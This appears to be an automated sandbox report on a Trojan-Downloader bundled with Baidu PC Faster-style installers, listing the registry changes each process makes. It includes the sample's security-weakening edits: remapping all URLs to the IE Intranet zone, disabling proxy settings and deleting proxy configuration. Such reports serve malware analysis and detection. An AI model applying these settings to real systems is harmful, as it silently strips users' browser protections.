[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Baidu_Drp_pos\DRP\Processing\%Documents and Settings%\All Users\Application Data\Baidu Security\RpData]
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-16-0154-[7431].dat"
"rpFile-PC_Faster_Setup_Mini_B104_144327560-2014-12-20 12-33-51-0529-[7545].dat"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PC_Faster_Setup_Mini_B104_144327560\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process MiniService.exe:1708 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 31 13 C7 15 5E AD CA 6D 1E 51 27 0A 6E 2D 8B"
The process MiniService.exe:2020 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 30 A2 93 AB A7 9D 93 BF 77 16 42 C6 A9 05 9C"
The process MiniService.exe:844 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 49 CE E6 C6 52 3B 54 17 11 A2 A4 AB 60 EC 21"
The process MiniService.exe:652 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 CF 71 F4 71 09 F4 6E 13 28 17 3B 3C 6E 09 E3"
The process PCFTray.exe:2564 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PCFTray\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 D9 7D 98 5D CA 0F 3A 24 7A 4A 24 19 40 59 AF"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PCFTray\DEBUG]
"Trace Level"
The process schtasks.exe:1544 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 79 84 A7 88 A7 52 21 0E 9E F7 7E A8 57 BE 7A"
The process schtasks.exe:1568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 FA 6F 6D 3F 33 E4 D3 4B F7 AF ED B8 56 EA DD"
The process schtasks.exe:136 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE 3C 75 4F 4A F1 EB 97 31 A3 8C 99 ED 81 86 D1"
The process schtasks.exe:1676 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B E7 4C 99 E0 04 0B 1A D8 55 AE 51 2D 1A 3C 21"
The process schtasks.exe:224 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 1E ED DB 6F 92 CC 0B 86 B3 13 30 B0 9E 18 BA"
The process schtasks.exe:1740 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 22 72 C3 73 16 9E 68 6C 7F EA AD A3 AD 08 A4"
The process schtasks.exe:2032 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 81 41 E5 2C A8 21 F0 67 9B DA 65 DF E6 9A 9F"
The process SysOptEngineSvc.exe:1724 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Baidu Security\PC Faster]
"TimeBoot" = "52"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 03 96 96 E7 58 54 76 4E E7 E7 2B 8F 44 B3 CB"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\SysOptEngineSvc\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\SysOptEngineSvc\DEBUG]
"Trace Level"
The process PopupTip.exe:2760 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PopupTip\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 C0 69 82 4C 33 25 1B 40 B2 FC EF 27 AE 84 2C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\PopupTip\DEBUG]
"Trace Level"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
The process ~dlBD.exe:1160 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 7B 1A BA FF 5F 41 F9 16 48 D3 1E 91 24 C8 61"
The process cscript.exe:2440 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D D2 BE 89 DE 8E 6C AE F2 02 AF 73 5C 88 04 D5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu Antivirus]
"InstallDir" = "bav"
[HKLM\SOFTWARE\Baidu Security\DuplicateRecord]
"PcfChannel" = "DirectAgents|br|IBD|Banner"
"PcfLastActiveTime" = "2014-12-20 10:34:24"
The process irsetup.exe:508 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"NoModify" = "1"
"DisplayVersion" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\Pci Recovery"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"yet_another_cleaner_mat.exe" = "standard installer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"PC_Faster_Setup_Mini_B104_144327560.exe" = "Baidu PC Faster MiniSetup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"DisplayName" = "Pci Recovery"
"HelpLink" = "www.pcinspector.de"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"UninstallString" = "%Program Files%\Pci Recovery\uninstall.exe /U:%Program Files%\Pci Recovery\Uninstall\uninstall.xml"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"DisplayIcon" = "%Program Files%\Pci Recovery\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 BC 67 E0 03 54 FE E9 62 49 3C 8D B2 4A 60 B0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"Publisher" = "Pci reocvery"
"URLInfoAbout" = "www.pcinspector.de"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pci Recovery1.0]
"Contact" = "Pci reocvery Support Department"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process iSafeDownloader.exe:1544 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B E2 E6 60 35 52 69 FC 8B 61 58 A7 C0 6E F8 59"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process yet_another_cleaner_mat.exe:1576 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B DB 75 2C A0 DC CA 2F 57 BF 42 B0 9D E0 6F 9C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
